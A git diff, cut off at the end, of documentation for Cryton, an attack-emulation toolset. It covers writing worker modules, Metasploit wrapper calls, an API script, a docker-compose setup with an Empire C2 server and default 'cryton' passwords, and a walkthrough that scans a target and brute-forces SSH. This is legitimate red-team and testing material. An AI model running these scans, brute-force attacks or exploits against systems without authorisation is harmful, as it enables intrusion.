(**must be called `mod.py`**). It consists of two main methods: +- `execute` (is used as an entry point for module execution; takes and returns **dictionary**) +- `validate` (is used to validate input parameters for the `execute` method; takes **dictionary** and returns 0 if it's okay, else raises an exception) + +You can also use [prebuilt functionality](#prebuilt-functionality) from Worker. + +Here's a simple example: +```python +def validate(arguments: dict) -> int: + if arguments != {}: + return 0 # If arguments are valid. + raise Exception("No arguments") # If arguments aren't valid. + +def execute(arguments: dict) -> dict: + # Do stuff. + return {"return_code": 0, "serialized_output": ["x", "y"]} + +``` + +And also a bit more complex example: +```python +from schema import Schema +from cryton_worker.lib.util.module_util import File + + +def validate(arguments: dict) -> int: + """ + Validate input arguments for the execute function. + :param arguments: Arguments for module execution + :raises: schema.SchemaError + :return: 0 If arguments are valid + """ + conf_schema = Schema({ + 'path': File(str), + }) + + conf_schema.validate(arguments) + return 0 + + +def execute(arguments: dict) -> dict: + """ + This attack module can read a local file. + Detailed information should be in README.md. + :param arguments: Arguments for module execution + :return: Generally supported output parameters (for more information check Cryton Worker README.md) + """ + # Set default return values + ret_vals = { + "return_code": -1, + "serialized_output": {}, + "output": "" + } + + # Parse arguments + path_to_file = arguments.get("path") + + try: # Try to get the file's content + with open(path_to_file) as f: + my_file = f.read() + except IOError as ex: # In case of fatal error (expected) update output + ret_vals.update({'output': str(ex)}) + return ret_vals + + # In case of success update return_code to 0 (OK) and send the file content to the worker + ret_vals.update({"return_code": 0}) + ret_vals.update({'output': my_file}) + + return ret_vals + +``` + +### test_mod.py +Contains a set of tests to check if the code is correct. + +Here's a simple example: +```python +from mod import execute + + +class TestMyModuleName: + def test_mod_execute(self): + arguments = {'cmd': "test"} + + result = execute(arguments) + + assert result == {"return_code": 0} + +``` + +### README.md +README file should describe what the module is for, its IO parameters, and give the user some examples. + +It should also say what system requirements are necessary (with version). + +### requirements.txt +Here are the specified Python packages that are required to run the module. These requirements must be compliant with the +Python requirements in Cryton Worker. + +For example, if the module wants to use the `schema` package with version *2.0.0*, but the Worker requires version *2.1.1*, it won't work. + +### example.py +Is a set of predefined parameters that should allow the user to test if the module works as intended. + +Example: + +```python +from mod import execute, validate + +args = { + "argument1": "value1", + "argument2": "value2" +} + +validate_output = validate(args) +print(f"validate output: {validate_output}") + +execute_output = execute(args) +print(f"execute output: {execute_output}") + + +``` + +## Prebuilt functionality +The worker provides prebuilt functionality to make building modules easier. Import it using: +```python +from cryton_worker.lib.util import module_util +``` + +It gives you access to: +### Metasploit +Wrapper for *MsfRpcClient* from *[pymetasploit3](https://github.com/DanMcInerney/pymetasploit3)*. +Examples: +```python +# Check if the connection to msfrpcd is OK before doing anything. +from cryton_worker.lib.util.module_util import Metasploit +msf = Metasploit() +if msf.is_connected(): + msf.do_stuff() +``` +```python +from cryton_worker.lib.util.module_util import Metasploit +search_criteria = {"via_exploit": "my/exploit"} +found_sessions = Metasploit().get_sessions(**search_criteria) +``` +```python +from cryton_worker.lib.util.module_util import Metasploit +output = Metasploit().execute_in_session("my_command", "session_id") +``` + +```python +from cryton_worker.lib.util.module_util import Metasploit + +options = {"exploit_arguments": {}, "payload_arguments": {}} +Metasploit().execute_exploit("my_exploit", "my_payload", **options) +``` +```python +from cryton_worker.lib.util.module_util import Metasploit +token = Metasploit().client.add_perm_token() +``` +```python +from cryton_worker.lib.util.module_util import Metasploit +output = Metasploit().get_parameter_from_session("session_id", "my_param") +``` + +### get_file_binary +Function to get a file as binary. +Example: +```python +from cryton_worker.lib.util.module_util import get_file_binary +my_file_content = get_file_binary("/path/to/my/file") +``` + +### File +Class used with *[schema](https://pypi.org/project/schema/)* for validation if the file exists. +Example: +```python +from schema import Schema +from cryton_worker.lib.util.module_util import File +schema = Schema(File(str)) +schema.validate("/path/to/file") +``` + +### Dir +Class used with *[schema](https://pypi.org/project/schema/)* for validation if the directory exists. +Example: +```python +from schema import Schema +from cryton_worker.lib.util.module_util import Dir +schema = Schema(Dir(str)) +schema.validate("/path/to/directory") +``` diff --git a/docs/development/worker.md b/docs/development/worker.md new file mode 100644 index 0000000000000000000000000000000000000000..276c58f7f149507881a2f53c66908c64c8645607 --- /dev/null +++ b/docs/development/worker.md @@ -0,0 +1,68 @@ +## Settings +The best thing you can do is to change the app directory to `path/to/cryton-worker/`. That way, you can edit the default .env file +and use it for the compose files. +```shell +export CRYTON_WORKER_APP_DIRECTORY=path/to/cryton-worker/ +``` + +[Link to the settings](../components/worker.md#settings). + +## Installation + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [Poetry](https://python-poetry.org/docs/#installation){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + +Clone the repository: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-worker.git +``` + +Start the [prerequisites](../components/worker.md#prerequisites). + +Then go to the correct directory and install the project: +```shell +cd cryton-worker +poetry install +``` + +To spawn a shell use: +```shell +poetry shell +``` + +## Usage +```shell +cryton-worker start +``` + +[Link to the usage](../components/worker.md#usage). + +## Testing + +### Pytest +``` +pytest --cov=cryton_worker tests/unit_tests --cov-config=.coveragerc-unit --cov-report html +``` + +???+ "Run specific test" + + ``` + my_test_file.py::MyTestClass::my_test + ``` + +### tox +Use in combination with [pyenv](https://github.com/pyenv/pyenv){target="_blank"}. + +```shell +tox -- tests/unit_tests/ --cov=cryton_worker --cov-config=.coveragerc-unit +``` + +## Bending the RabbitMQ API +It is possible to use Cryton Worker as a standalone application and control it using your requests. +It is also possible to create your Worker and use Core to control it. diff --git a/docs/dynamic-execution.md b/docs/dynamic-execution.md new file mode 100644 index 0000000000000000000000000000000000000000..a532d7a8a6b5c2b392bd07ee737ca38d04f3445f --- /dev/null +++ b/docs/dynamic-execution.md @@ -0,0 +1,144 @@ +To support dynamic security testing. We've added support for creating dynamic plans. They allow the user to +create an empty Plan/Stage and create their agent to control the execution instead of Cryton's advanced scheduler. + +## Features +- Create a Plan/Step/Stage for dynamic execution (an empty list of Stages/Steps can be provided) +- Add Step to Stage execution and execute it +- Add Stage to Plan execution and start it +- Added Steps are automatically set as a successor of the last Step (only if the `is_init` variable is **not** set to *True* and a possible parent Step exists) + +## Limitations +- Dynamic plan must have a `dynamic` variable set to *True* +- If you don't want to pass any Stages/Steps you must provide an empty list +- Each Stage and Step must have a unique name in the same Plan (utilize [inventory variables](designing-phase/plan-instance.md#inventory-files) to overcome this limitation) +- The Stage/Step you're trying to add must be valid +- Run's Plan must contain the instance (Stage/Step) you are trying to execute +- You cannot create multiple executions for an instance (you can execute an instance only once) under the same Plan execution + +## Example using Python +You will probably want to automate these actions rather than using CLI to do them. For this purpose, we will create a simple Python script that will: + +1. Create a template +2. Create a Plan +3. Add a Stage +4. Add a Step +5. Create a Run +6. Execute the Run +7. Create a new Step +8. Execute the new Step +9. Get the Run report + +!!! danger "Requirements" + + - Cryton Core is running (REST API is accessible at *localhost:8000*) + - Worker is registered in Core and running + - mod_cmd is accessible from the Worker + +Download the example script: + +=== "curl" + + ```shell + curl -O {{{config.site_url}}}{{{ release_version }}}/dynamic_example.py + ``` + +=== "wget" + + ```shell + wget {{{config.site_url}}}{{{ release_version }}}/dynamic_example.py + ``` + +Update the `WORKER_ID` variable, and run the script: +```shell +python3 dynamic_example.py +``` + +??? abstract "Show the example" + + ```python + {! include "dynamic_example.py" !} + ``` + +## Example using CLI +For this example we will assume that: + +!!! danger "Requirements" + + - Cryton Core is running (REST API is accessible at *localhost:8000*) + - Worker is registered in Core and running + - mod_cmd is accessible from the Worker + +Files used in this guide can be found in the [Cryton Core repository](https://gitlab.ics.muni.cz/cryton/cryton-core/-/tree/{{{ git_release }}}/examples/dynamic-execution-example){target="_blank"}. + +It's best to switch to the example directory, so we will assume that's true. +```shell +cd /path/to/cryton-core/examples/dynamic-execution-example/ +``` + +### Building a base Plan and executing it +First, we create a template +```shell +cryton-cli plan-templates create template.yml +``` + +Create a Plan (instance) +```shell +cryton-cli plans create <template_id> +``` + +Add a Stage to the Plan (update the inventory file to your needs) +```shell +cryton-cli stages create <plan_id> stage.yml -i stage-inventory.yml +``` + +Add an initial Step to the Stage +```shell +cryton-cli steps create <stage_id> step-init.yml +``` + +Add a reusable Step to the Stage (update the inventory file to your needs) +```shell +cryton-cli steps create <stage_id> step-reusable.yml -i step-reusable-inventory.yml +``` + +Create a Worker you want to test on +```shell +cryton-cli workers create local +``` + +Create a Run +```shell +cryton-cli runs create <plan_id> <worker_id> +``` + +Execute the Run +```shell +cryton-cli runs execute <run_id> +``` + +### Start a standalone Stage: +Add your Stage to the desired Plan (**Update the inventory file! Stage names must be unique.**) +```shell +cryton-cli stages create <plan_id> stage.yml -i stage-inventory.yml +``` + +Start your Stage (its trigger) under the desired Plan execution +```shell +cryton-cli stages start-trigger <stage_id> <plan_execution_id> +``` + +### Execute a standalone Step: +Add your Step to the desired Stage (**Update the inventory file! Step names must be unique.**) +```shell +cryton-cli steps create <stage_id> step-reusable.yml -i step-reusable-inventory.yml +``` + +Execute your Step under the desired Stage execution +```shell +cryton-cli steps execute <step_id> <stage_execution_id> +``` + +### Check the results - works only once the Run is created: +```shell +cryton-cli runs report 1 --less +``` diff --git a/docs/dynamic_example.py b/docs/dynamic_example.py new file mode 100644 index 0000000000000000000000000000000000000000..ebe1b078c8181db6fea037a7a27ce30be41e4c82 --- /dev/null +++ b/docs/dynamic_example.py @@ -0,0 +1,120 @@ +import requests +import yaml +import time + +WORKER_ID = 0 + +TEMPLATE = { + "plan": { + "name": "example", + "owner": "Cryton", + "dynamic": True, + "stages": [] + } +} + +STAGE = { + "name": "no delay stage {{ id }}", + "trigger_type": "delta", + "trigger_args": { + "seconds": 0 + }, + "steps": [] +} + +STEP = { + "name": "initial step", + "step_type": "worker/execute", + "is_init": True, + "arguments": { + "module": "mod_cmd", + "module_arguments": { + "cmd": "whoami" + } + } +} + +STEP_REUSABLE = { + "name": "reusable step {{ id }}", + "step_type": "worker/execute", + "arguments": { + "module": "mod_cmd", + "module_arguments": { + "cmd": "{{ command }}" + } + } +} + + +def get_api_root(): + api_address = "localhost" + api_port = 8000 + return f"http://{api_address}:{api_port}/api/" + + +if __name__ == "__main__": + # Check if the Worker is specified + if WORKER_ID < 1: + raise Exception("Please specify a correct Worker ID at the top of the file.") + print(f"Worker id: {WORKER_ID}") + + # Get api root + api_root = get_api_root() + + # 1. Create a template + r_create_template = requests.post(f"{api_root}templates/", files={"file": yaml.dump(TEMPLATE)}) + template_id = r_create_template.json()['id'] + print(f"Template id: {template_id}") + + # 2. Create a Plan + r_create_plan = requests.post(f"{api_root}plans/", data={'template_id': template_id}) + plan_id = r_create_plan.json()['id'] + print(f"Plan id: {plan_id}") + + # 3. Add a Stage + stage_inventory = {"id": 1} + r_create_stage = requests.post(f"{api_root}stages/", data={'plan_id': plan_id}, + files={"file": yaml.dump(STAGE), "inventory_file": yaml.dump(stage_inventory)}) + stage_id = r_create_stage.json()['id'] + print(f"Stage id: {stage_id}") + + # 4. Add a Step + r_create_step = requests.post(f"{api_root}steps/", data={'stage_id': stage_id}, files={"file": yaml.dump(STEP)}) + step_id = r_create_step.json()['id'] + print(f"Step id: {step_id}") + + # 5. Create a new Run + r_create_run = requests.post(f"{api_root}runs/", data={'plan_id': plan_id, "worker_ids": [WORKER_ID]}) + run_id = r_create_run.json()["id"] + print(f"Run id: {run_id}") + + # 6. Execute the Run + r_execute_run = requests.post(f"{api_root}runs/{run_id}/execute/", data={'run_id': run_id}) + print(f"Run response: {r_execute_run.text}") + + # 7. Create a new Step + step_inventory = {"id": 1, "command": "echo test"} + r_create_step2 = requests.post(f"{api_root}steps/", data={'stage_id': stage_id}, + files={"file": yaml.dump(STEP_REUSABLE), + "inventory_file": yaml.dump(step_inventory)}) + step_id2 = r_create_step2.json()['id'] + print(f"Second step id: {step_id2}") + + # 8. Execute the new Step (First, get Stage execution's id) + stage_execution_id = requests.get(f"{api_root}runs/{run_id}/report/")\ + .json()["detail"]["plan_executions"][0]["stage_executions"][0]["id"] + r_execute_step = requests.post(f"{api_root}steps/{step_id2}/execute/", + data={'stage_execution_id': stage_execution_id}) + print(f"Second Step response: {r_execute_step.text}") + + # 9. Get Run report + for i in range(5): + time.sleep(3) + current_state = requests.get(f"{api_root}runs/{run_id}/").json()["state"] + if current_state == "FINISHED": + break + print(f"Waiting for a final state. Current state: {current_state}") + + print() + print("Report: ") + print(yaml.dump(requests.get(f"{api_root}runs/{run_id}/report/").json()["detail"])) diff --git a/docs/2022.2/execution-phase/execution.md b/docs/execution-phase/execution.md similarity index 100% rename from docs/2022.2/execution-phase/execution.md rename to docs/execution-phase/execution.md diff --git a/docs/2022.2/execution-phase/reporting.md b/docs/execution-phase/reporting.md similarity index 100% rename from docs/2022.2/execution-phase/reporting.md rename to docs/execution-phase/reporting.md diff --git a/docs/2022.2/execution-phase/run.md b/docs/execution-phase/run.md similarity index 100% rename from docs/2022.2/execution-phase/run.md rename to docs/execution-phase/run.md diff --git a/docs/extra/variables.yml b/docs/extra/variables.yml new file mode 100644 index 0000000000000000000000000000000000000000..d547d53188239068be4aca1f5d1a7620c4f6f47e --- /dev/null +++ b/docs/extra/variables.yml @@ -0,0 +1,6 @@ +release_version: 2023.1 +git_release: stable/2023.1 + +python: + min: 3.8 + max: 3.12 \ No newline at end of file diff --git a/docs/getting-started/.env b/docs/getting-started/.env new file mode 100644 index 0000000000000000000000000000000000000000..f263281dfbafb255fa2f48370361698a0a6dd942 --- /dev/null +++ b/docs/getting-started/.env @@ -0,0 +1,27 @@ +CRYTON_CORE_RABBIT_HOST=cryton-rabbit +CRYTON_CORE_RABBIT_PORT=5672 +CRYTON_CORE_RABBIT_USERNAME=cryton +CRYTON_CORE_RABBIT_PASSWORD=cryton +CRYTON_CORE_DB_HOST=cryton-pgbouncer +CRYTON_CORE_DB_PORT=5432 +CRYTON_CORE_DB_NAME=cryton +CRYTON_CORE_DB_USERNAME=cryton +CRYTON_CORE_DB_PASSWORD=cryton +CRYTON_CORE_API_SECRET_KEY=cryton +CRYTON_CORE_API_USE_STATIC_FILES=true + +CRYTON_WORKER_NAME=local_worker +CRYTON_WORKER_MODULES_DIR=/opt/modules/ +CRYTON_WORKER_MSFRPCD_HOST=127.0.0.1 +CRYTON_WORKER_MSFRPCD_PORT=55553 +CRYTON_WORKER_MSFRPCD_SSL=true +CRYTON_WORKER_MSFRPCD_USERNAME=cryton +CRYTON_WORKER_MSFRPCD_PASSWORD=cryton +CRYTON_WORKER_RABBIT_HOST=cryton-rabbit +CRYTON_WORKER_RABBIT_USERNAME=cryton +CRYTON_WORKER_RABBIT_PASSWORD=cryton +CRYTON_WORKER_EMPIRE_HOST=cryton-empire +CRYTON_WORKER_EMPIRE_USERNAME=cryton +CRYTON_WORKER_EMPIRE_PASSWORD=cryton + +CRYTON_CLI_API_PORT=80 diff --git a/docs/2022.2/starting-point/ansible.md b/docs/getting-started/ansible.md similarity index 96% rename from docs/2022.2/starting-point/ansible.md rename to docs/getting-started/ansible.md index 424ec0f88da5430880d1c8cc3f98334bca9604e2..fec343cdad1de5f977198f5c348d6781afaf4f2c 100644 --- a/docs/2022.2/starting-point/ansible.md +++ b/docs/getting-started/ansible.md @@ -19,7 +19,7 @@ and select the latest version (**the master branch is not stable**). Install prerequisites, dependencies (RabbitMQ, Postgres, and PgBouncer), and Core using Docker Compose. Core's REST API is by default served on port 8000. -Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/core/#settings). +Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/core/#settings){target="_blank"}. In the Ansible playbook use the following: ```yaml - role: deploy-core @@ -48,7 +48,7 @@ Set `cryton_cli_runas_user` to the correct user for whom will the Worker be inst Optionally, Worker can be installed in a mode fitting for development purposes. To enable this mode, set ``development: True`` variable for Ansible. This will install and run the Worker using poetry. -Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/worker/#settings). +Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/worker/#settings){target="_blank"}. In the Ansible playbook use the following: ```yaml - role: deploy-worker @@ -66,7 +66,7 @@ Install prerequisites, dependencies, and CLI in `~/.local/bin/cryton-cli` using Set `cryton_cli_runas_user` to the correct user for whom will the Worker be installed. -Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/cli/#settings). +Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/cli/#settings){target="_blank"}. In the Ansible playbook use the following: ```yaml - role: deploy-cli @@ -82,7 +82,7 @@ Register Worker in Core using CLI. Specify `cryton_worker_name`, `cryton_worker_description`, and `cryton_cli_runas_user` to the correct user with access to the CLI. -Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/cli/#settings). +Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/cli/#settings){target="_blank"}. In the Ansible playbook use the following: ```yaml - role: register-worker @@ -98,7 +98,7 @@ Install prerequisites and frontend for Cryton Core API using Docker Compose. The **!This role requires the host to have at least 2048 MB RAM and 2 CPU cores (tested with AMD Ryzen 5 5600x) otherwise the Frontend installation might fail.!** -Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/frontend/#settings). +Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/frontend/#settings){target="_blank"}. In the Ansible playbook use the following: ```yaml - role: deploy-frontend diff --git a/docs/getting-started/docker-compose.yml b/docs/getting-started/docker-compose.yml new file mode 100644 index 0000000000000000000000000000000000000000..062e170f5b3408f75a6f50d9580cc1c719e45500 --- /dev/null +++ b/docs/getting-started/docker-compose.yml @@ -0,0 +1,131 @@ +version: '3.9' +services: + cryton_core: + restart: always + image: registry.gitlab.ics.muni.cz:443/cryton/cryton-core:{{{ release_version }}} + container_name: cryton-core + ports: + - "8000:80" + env_file: + - .env + depends_on: + cryton_pgbouncer: + condition: service_healthy + cryton_rabbit: + condition: service_healthy + + cryton_proxy: + restart: always + image: registry.gitlab.ics.muni.cz:443/cryton/cryton-core:proxy-{{{ release_version }}} + container_name: cryton-proxy + network_mode: service:cryton_core + depends_on: + cryton_core: + condition: service_started + + cryton_cli: + restart: always + image: registry.gitlab.ics.muni.cz:443/cryton/cryton-cli:{{{ release_version }}} + container_name: cryton-cli + network_mode: service:cryton_core + env_file: + - .env + depends_on: + cryton_core: + condition: service_started + tty: true + + cryton_worker: + restart: always + image: registry.gitlab.ics.muni.cz:443/cryton/cryton-worker:kali-{{{ release_version }}} + container_name: cryton-worker + network_mode: host + env_file: + - .env + volumes: + - ./cryton-modules/modules/:${CRYTON_WORKER_MODULES_DIR} + - cryton_worker_db_data:/var/lib/postgresql/15/main + + cryton_empire: + restart: always + image: bcsecurity/empire:v4.10.0 + container_name: cryton-empire + expose: + - "1337" + env_file: + - .env + stdin_open: true + command: [ "server", "--username", "$CRYTON_WORKER_EMPIRE_USERNAME", "--password", "$CRYTON_WORKER_EMPIRE_PASSWORD" ] + + cryton_db: + restart: always + image: postgres:13 + container_name: cryton-db + env_file: + - .env + environment: + POSTGRES_PASSWORD: $CRYTON_CORE_DB_PASSWORD + POSTGRES_USER: $CRYTON_CORE_DB_USERNAME + POSTGRES_DB: $CRYTON_CORE_DB_NAME + volumes: + - cryton_core_db_data:/var/lib/postgresql/data + expose: + - "5432" + healthcheck: + test: /usr/bin/pg_isready + interval: 20s + timeout: 10s + retries: 5 + + cryton_pgbouncer: + restart: always + image: edoburu/pgbouncer:1.18.0 + container_name: cryton-pgbouncer + depends_on: + cryton_db: + condition: service_healthy + env_file: + - .env + environment: + DB_HOST: cryton_db + DB_USER: $CRYTON_CORE_DB_USERNAME + DB_NAME: $CRYTON_CORE_DB_NAME + DB_PASSWORD: $CRYTON_CORE_DB_PASSWORD + MAX_CLIENT_CONN: 5000 + DEFAULT_POOL_SIZE: 8 + MIN_POOL_SIZE: 8 + POOL_MODE: transaction + expose: + - "5432" + healthcheck: + test: /usr/bin/pg_isready -h 0.0.0.0 -p 5432 + interval: 20s + timeout: 10s + retries: 5 + + cryton_rabbit: + restart: always + image: rabbitmq:3.11-management + container_name: cryton-rabbit + env_file: + - .env + environment: + RABBITMQ_DEFAULT_USER: $CRYTON_CORE_RABBIT_USERNAME + RABBITMQ_DEFAULT_PASS: $CRYTON_CORE_RABBIT_PASSWORD + ports: + - "5672:5672" + - "127.0.0.1:15672:15672" + healthcheck: + test: rabbitmqctl eval ' + { true, rabbit_app_booted_and_running } = { rabbit:is_booted(node()), rabbit_app_booted_and_running }, + { [], no_alarms } = { rabbit:alarms(), no_alarms }, + [] /= rabbit_networking:active_listeners(), + rabbitmq_node_is_healthy. + ' || exit 1 + interval: 20s + timeout: 10s + retries: 5 + +volumes: + cryton_core_db_data: + cryton_worker_db_data: diff --git a/docs/getting-started/execution-example.md b/docs/getting-started/execution-example.md new file mode 100644 index 0000000000000000000000000000000000000000..e122c910a7bd70b47a49950bfd151b1cea1f0237 --- /dev/null +++ b/docs/getting-started/execution-example.md @@ -0,0 +1,264 @@ +Now, we will walk through an example execution. We will follow the workflow specified in the [previous guide](workflow.md). + +!!! warning "Prerequisites" + + It is assumed that you've followed the [quick-start](quick-start.md) guide. If that's not the case, make sure the following requirements are met: + + - [Core](../components/core.md) is up and running + - Core's [prerequisites](../components/core.md#prerequisites) are up and running + - [CLI](../components/cli.md) is installed + - [Worker](../components/worker.md) is installed, running, and correctly set up to use the [modules](../components/modules.md) + - Worker's [prerequisites](../components/worker.md#prerequisites) are up and running + - [Modules](../components/modules.md#installation)' system requirements are satisfied + - If CLI and Core are not on the same machine, make sure to update [CLI's settings](../components/cli.md#crytoncliapihost) + +## Create a plan template +To execute our attack plan, we must create its [template](../designing-phase/template.md) first – a description +of the actions required to run during attack execution based on tools used during the attack. + +We will be using a basic example, which can be found +[here](https://gitlab.ics.muni.cz/cryton/cryton-core/-/tree/{{{ git_release }}}/examples){target="_blank"} as well as other examples. + +Download it [manually](https://gitlab.ics.muni.cz/cryton/cryton-core/-/blob/{{{ git_release }}}/examples/basic-example/template.yml){target="_blank"} or using: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/examples/basic-example/template.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/examples/basic-example/template.yml + ``` + +It describes a 2 step attack plan. First, it scans the target and checks if port 22 is open. If the port is open, it tries to brute force the credentials. + +```mermaid +graph LR + A[Start] --> B[Scan target]; + B --> C{Is port 22 open?}; + C -->|No| E[Finish]; + C -->|Yes| D[Bruteforce credentials]; + D --> E; +``` + +--- + +If we are satisfied with our template, we can upload it using CLI: +```shell +cryton-cli plan-templates create path/to/template.yml +``` + +??? example "Example" + + ```shell + cryton-cli plan-templates create template.yml + ``` + + Expected output: + ``` + Template successfully created! ({'id': 1}) + ``` + +??? tip "Validate the template first" + + Before we upload the template, we should validate it. However, for our template to be validated correctly, + we have to provide an inventory file, which is described [here](#create-a-plan-instance). Once we have it, we can simply run: + ```shell + cryton-cli plans validate template.yml -i inventory.yml + ``` + + ??? example "Example" + + ```shell + cryton-cli plans validate template.yml -i inventory.yml + ``` + + Expected output: + ``` + Plan successfully validated! (<response>) + ``` + + Don't forget to upload the template afterward. + +## Register the Worker +To be able to use our Worker, we have to register it. Keep in mind that **WORKER_NAME** must match the Worker’s `CRYTON_WORKER_NAME` setting: +```shell +cryton-cli workers create <WORKER_NAME> -d <WORKER_DESCRIPTION> +``` + +??? example "Example" + + ```shell + cryton-cli workers create local_worker -d "my worker on localhost" + ``` + + Expected output: + ``` + Worker successfully created! ({'id': 1}) + ``` + +To check if the Worker is running, use the health check: +```shell +cryton-cli workers health-check <WORKER_ID> +``` + +??? example "Example" + + ```shell + cryton-cli workers health-check 1 + ``` + + Expected output: + ``` + The Worker successfully checked! (<response>) + ``` + +## Create a Plan instance +Now we need to create a Plan instance we will use for the execution. Create it using a combination of +the previously uploaded template and an [inventory file](../designing-phase/plan-instance.md#inventory-files). + +Download the inventory file [manually](https://gitlab.ics.muni.cz/cryton/cryton-core/-/blob/{{{ git_release }}}/examples/basic-example/inventory.yml){target="_blank"} or using: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/examples/basic-example/inventory.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/examples/basic-example/inventory.yml + ``` + +It determines the missing variables in the template. More precisely, it states the target and the credentials used for the brute force attack. + +To create a new Plan instance use: +```shell +cryton-cli plans create <TEMPLATE_ID> -i path/to/my/inventory.yml +``` + +??? example "Example" + + ```shell + cryton-cli plans create 1 -i inventory.yml + ``` + + Expected output: + ``` + Plan Instance successfully created! ({'id': 1}) + ``` + +## Create a Run +The last step we have to make is to create a new [Run](../execution-phase/run.md) from the previously created Plan instance +and Worker(s). To do so, use: +```shell +cryton-cli runs create <PLAN_INSTANCE_ID> <WORKER_ID1> <WORKER_ID2> <WORKER_ID3> ... +``` + +??? example "Example" + + ```shell + cryton-cli runs create 1 1 2 3 + ``` + + Expected output: + ``` + Run successfully created! ({'id': 1}) + ``` + +## Execute the Run + +!!! warning "It works.. but at what cost?" + + Please, make sure that you are allowed to run the scan and brute force (there **shouldn't** be any problems doing so on **localhost**). + Otherwise, there may be consequences. + +Now that everything is prepared, we can execute our Run immediately or schedule it for later. + +=== "immediately" + + To execute the Run immediately use: + + ```shell + cryton-cli runs execute <RUN_ID> + ``` + + ??? example "Example" + + ```shell + cryton-cli runs execute 1 + ``` + + Expected output: + ``` + Run successfully executed! (Run 1 was executed.) + ``` + +=== "schedule it for later" + + Run executions can be scheduled to a specific date and time. By default, the system timezone will be used. To use the UTC timezone, use the `--utc-timezone` flag. + ```shell + cryton-cli runs schedule <RUN_ID> <DATE> <TIME> + ``` + + ??? example "Example" + + ```shell + cryton-cli runs schedule 1 2020-06-08 10:00:00 + ``` + + Expected output: + ``` + Run successfully scheduled! (Run 1 is scheduled for 2020-06-08 10:00:00.) + ``` + +## Show Run information +To see if the executed Run has finished, you can check its state (and other useful information): +```shell +cryton-cli runs show <RUN_ID> +``` + +??? example "Example" + + ```shell + cryton-cli runs show 1 + ``` + + Expected output: + ``` + id: 1, schedule_time: None, start_time: 2021-05-24T00:08:45.200025, pause_time: None, finish_time: 2021-05-24T00:09:18.397199, state: RUNNING + ``` + +## Get a report +It is crucial to know the current state of your Run and its results. That is why a report can be generated anytime during the execution: +```shell +cryton-cli runs report <RUN_ID> +``` + +??? example "Example" + + ```shell + cryton-cli runs report 1 + ``` + + Expected output: + ``` + Successfully created Run's report! (file saved at: /tmp/report_run_1_2020-06-08-10-15-00-257994_xdQeV) + ``` + +??? tip "Read the report directly" + + Reports can be viewed directly in cryton-cli (**to quit, press Q**): + ```shell + cryton-cli runs report <RUN_ID> --less + ``` + + ??? example "Example" + + ```shell + cryton-cli runs report 1 --less + ``` diff --git a/docs/2022.2/starting-point/testing-environment.md b/docs/getting-started/playground.md similarity index 85% rename from docs/2022.2/starting-point/testing-environment.md rename to docs/getting-started/playground.md index 6a27fb5237922ceb7e2b4ddc351126ae086b072f..42eeadef78a2cf7f3fb3abc6b80c9b5b03ffbc53 100644 --- a/docs/2022.2/starting-point/testing-environment.md +++ b/docs/getting-started/playground.md @@ -7,7 +7,7 @@ Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux** use it everywhere if the requirements are met. Please keep in mind that **only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. -[Link to the Cryton toolset documentation](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/). +[Link to the Cryton toolset documentation](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/){target="_blank"}. ## Installation and setup It is recommended to use the Vagrant environment due to its easier setup and usage. @@ -16,9 +16,9 @@ It is recommended to use the Vagrant environment due to its easier setup and usa This section describes how to quickly build the [infrastructure](#infrastructure) and run the tests. **Requirements**: -- [Vagrant](https://www.vagrantup.com/) -- [Virtualbox](https://www.virtualbox.org/) -- [Ansible](https://docs.ansible.com/ansible/latest/index.html) +- [Vagrant](https://www.vagrantup.com/){target="_blank"} +- [Virtualbox](https://www.virtualbox.org/){target="_blank"} +- [Ansible](https://docs.ansible.com/ansible/latest/index.html){target="_blank"} Check if the requirements are met using: ```shell @@ -32,7 +32,7 @@ Go to the correct directory, if you haven't already: cd cryton-e2e ``` -Download the *[Cryton Deploy](https://gitlab.ics.muni.cz/cryton/cryton-deploy)* project. +Download the *[Cryton Deploy](https://gitlab.ics.muni.cz/cryton/cryton-deploy){target="_blank"}* project. ```shell git clone https://gitlab.ics.muni.cz/cryton/cryton-deploy.git ``` @@ -73,21 +73,21 @@ If there is a connection error due to an ssh problem, just shut down the machine (`vagrant halt <machine>`) and run `vagrant up` again. ### Manual installation (NOT RECOMMENDED) -This segment only explains how to install the **[Cryton E2E](https://gitlab.ics.muni.cz/cryton/cryton-e2e)** +This segment only explains how to install the **[Cryton E2E](https://gitlab.ics.muni.cz/cryton/cryton-e2e){target="_blank"}** package. To be able to run the tests, you need to install the -**[Cryton CLI](https://gitlab.ics.muni.cz/cryton/cryton-cli)**, -**[Cryton Core](https://gitlab.ics.muni.cz/cryton/cryton-core)** -and **[Cryton 